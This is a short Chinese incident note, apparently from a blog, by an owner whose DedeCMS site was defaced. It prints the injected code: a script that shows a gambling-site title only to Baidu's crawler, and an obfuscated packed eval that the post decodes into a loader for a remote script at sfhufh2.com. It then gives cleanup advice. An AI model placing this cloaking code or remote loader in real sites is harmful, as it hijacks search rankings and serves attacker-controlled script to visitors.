早上收到通知说网站被篡改,织梦index.html和index.php 以及模板页被加了以下代码..
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="网站正常的网站标题"}</script>
网站标题关键字和描述已经被篡改了,这段代码判断了来路,如果是百度,就显示菠菜网站的标题,如果是直接打开或者其他来路,就显示正常的网站名称。
<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('m["\\n\\b\\2\\e\\f\\7\\l\\0"]["\\o\\4\\8\\0\\7"](\'\\j\\1\\2\\4\\8\\3\\0 \\0\\k\\3\\7\\d\\6\\0\\7\\p\\0\\5\\h\\c\\t\\c\\1\\2\\4\\8\\3\\0\\6 \\1\\4\\2\\d\\6\\9\\0\\0\\3\\1\\v\\5\\5\\1\\a\\9\\e\\a\\9\\s\\g\\2\\b\\f\\5\\u\\r\\q\\3\\g\\h\\1\\6\\i\\j\\5\\1\\2\\4\\8\\3\\0\\i\');',32,32,'x74|x73|x63|x70|x72|x2f|x22|x65|x69|x68|x66|x6f|x61|x3d|x75|x6d|x2e|x6a|x3e|x3c|x79|x6e|window|x64|x77|x78|x71|x38|x32|x76|x6b|x3a'.split('|'),0,{}))
</script>
解密后:
//向页面document.write了引用脚本的代码。
<script type="text/javascript"src="https://sfhufh2.com/k8qp.js"></script>
脚本内容
清理掉代码一般都能解决,同时建议整站盘查一句话木马。
更新织梦版本,修改目录权限。